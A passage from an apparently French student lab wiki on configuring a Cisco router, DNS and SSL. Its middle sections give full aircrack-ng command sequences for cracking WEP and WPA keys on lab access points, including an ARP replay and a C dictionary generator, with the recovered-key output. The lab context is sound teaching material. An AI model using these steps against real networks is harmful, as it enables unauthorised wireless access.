SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e semaine====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5ème semaine ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''000-speedflash.space-ssl.conf''' afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;#NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/www.speedflash.space&amp;gt;&lt;br /&gt;
